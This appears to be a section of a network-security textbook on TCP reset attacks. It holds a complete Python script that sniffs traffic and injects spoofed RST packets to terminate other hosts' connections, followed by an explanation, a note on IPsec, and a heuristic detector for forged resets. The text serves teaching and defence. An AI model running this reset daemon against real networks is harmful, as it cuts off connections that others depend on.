
5.11 RST Daemon

An RST daemon is a program that resets foreign TCP connections: the attacker sends a spoofed TCP packet with the RST flag set to terminate a connection.

#!/usr/bin/python

import sys
import getopt
import pcapy
from scapy.all import send, IP, TCP
from impacket.ImpactDecoder import EthDecoder, IPDecoder
from impacket.ImpactDecoder import TCPDecoder


dev = "eth0"
filter = ""
eth_decoder = EthDecoder()
ip_decoder = IPDecoder()
tcp_decoder = TCPDecoder()


def handle_packet(hdr, data):
    # Decode the captured frame layer by layer
    eth = eth_decoder.decode(data)
    ip = ip_decoder.decode(eth.get_data_as_string())
    tcp = tcp_decoder.decode(ip.get_data_as_string())

    # Only react to segments of an established connection
    if not tcp.get_SYN() and not tcp.get_RST() and \
       not tcp.get_FIN() and tcp.get_ACK():
        # Swap addresses and ports so the RST seems to come from the peer
        packet = IP(src=ip.get_ip_dst(),
                    dst=ip.get_ip_src()) / \
                 TCP(sport=tcp.get_th_dport(),
                     dport=tcp.get_th_sport(),
                     seq=tcp.get_th_ack(),
                     ack=tcp.get_th_seq()+1,
                     flags="R")

        send(packet, iface=dev)

        print "RST %s:%d -> %s:%d" % (ip.get_ip_src(),
                                      tcp.get_th_sport(),
                                      ip.get_ip_dst(),
                                      tcp.get_th_dport())


def usage():
    print sys.argv[0] + " -i <dev> -f <pcap_filter>"
    sys.exit(1)

try:
    cmd_opts = "f:i:"
    opts, args = getopt.getopt(sys.argv[1:], cmd_opts)
except getopt.GetoptError:
    usage()

for opt in opts:
    if opt[0] == "-f":
        filter = opt[1]
    elif opt[0] == "-i":
        dev = opt[1]
    else:
        usage()

pcap = pcapy.open_live(dev, 1500, 0, 100)

# Always restrict the capture to TCP
if filter:
    filter = "tcp and " + filter
else:
    filter = "tcp"

pcap.setfilter(filter)
# Join the two literals first so that % formats the whole message
print ("Resetting all TCP connections on %s "
       "matching filter %s " % (dev, filter))
pcap.loop(0, handle_packet)

The source code is a mix of a sniffer (see Sect. 5.4) and IP spoofing (Sect. 5.6). Only the handle_packet function differs from a normal sniffer. It constructs a new packet that appears to come from the destination of the intercepted packet: it swaps the source and destination addresses and the source and destination ports, and sets the acknowledgment number to the intercepted sequence number plus one (have a look at Sect. 2.9 if you don't remember why). The sequence number is set to the intercepted acknowledgment number, because that is the sequence number the source expects next.

The protection possibilities against such attacks are the same as against ordinary IP spoofing threats: use IPsec and sign your IP packets cryptographically.
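Where IPsec is not deployed, a monitoring sensor can still look for side effects of a forged reset, since the sequence number itself is the one the receiver expects. The following is an added example, not code from the book: it scans a constructed list of packet records for a RST whose IP TTL differs from the TTL seen earlier from that sender, and for a sender that keeps transmitting after it supposedly reset the connection. The record layout, the function name find_suspect_resets, the addresses and the one-second window are assumptions made for illustration.

```python
from collections import defaultdict

# Constructed sample records, not a real capture:
# (time, src, sport, dst, dport, flags, ttl, payload_len)
SAMPLE = [
    (0.00, "10.0.0.5", 40000, "192.0.2.10", 80, "A", 64, 0),
    (0.01, "192.0.2.10", 80, "10.0.0.5", 40000, "PA", 52, 512),
    (0.02, "10.0.0.5", 40000, "192.0.2.10", 80, "A", 64, 0),
    # Forged RST claiming to come from the server, but with a local TTL.
    (0.02, "192.0.2.10", 80, "10.0.0.5", 40000, "R", 64, 0),
    # The real server never reset anything and keeps sending data.
    (0.03, "192.0.2.10", 80, "10.0.0.5", 40000, "PA", 52, 512),
    (1.00, "10.0.0.7", 40001, "192.0.2.10", 80, "A", 64, 0),
    (1.01, "192.0.2.10", 80, "10.0.0.7", 40001, "A", 52, 0),
    # Genuine reset: TTL matches and the sender goes quiet afterwards.
    (1.02, "192.0.2.10", 80, "10.0.0.7", 40001, "R", 52, 0),
]


def find_suspect_resets(packets, window=1.0):
    """Return {packet index: [reasons]} for RSTs that look injected."""
    ttl_seen = defaultdict(set)   # direction -> TTLs seen on non-RST packets
    resets = {}                   # direction -> (index, time) of the last RST
    suspects = defaultdict(list)
    for i, (t, src, sport, dst, dport, flags, ttl, _plen) in enumerate(packets):
        direction = (src, sport, dst, dport)
        if "R" in flags:
            # Heuristic 1: the RST took a different path than earlier traffic.
            if ttl_seen[direction] and ttl not in ttl_seen[direction]:
                suspects[i].append("ttl-mismatch")
            resets[direction] = (i, t)
            continue
        if "S" in flags:
            # Port reuse by a new connection is not activity after a RST.
            resets.pop(direction, None)
            ttl_seen[direction].clear()
        elif direction in resets and t - resets[direction][1] <= window:
            # Heuristic 2: the alleged sender of the RST is still talking.
            suspects[resets.pop(direction)[0]].append("sender-active-after-rst")
        ttl_seen[direction].add(ttl)
    return dict(suspects)


if __name__ == "__main__":
    for index, reasons in sorted(find_suspect_resets(SAMPLE).items()):
        print(index, SAMPLE[index][1:5], reasons)
```

Both signals are heuristics: route changes alter TTLs and reordered packets can trail a real RST, so treat hits as leads for investigation rather than proof.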

 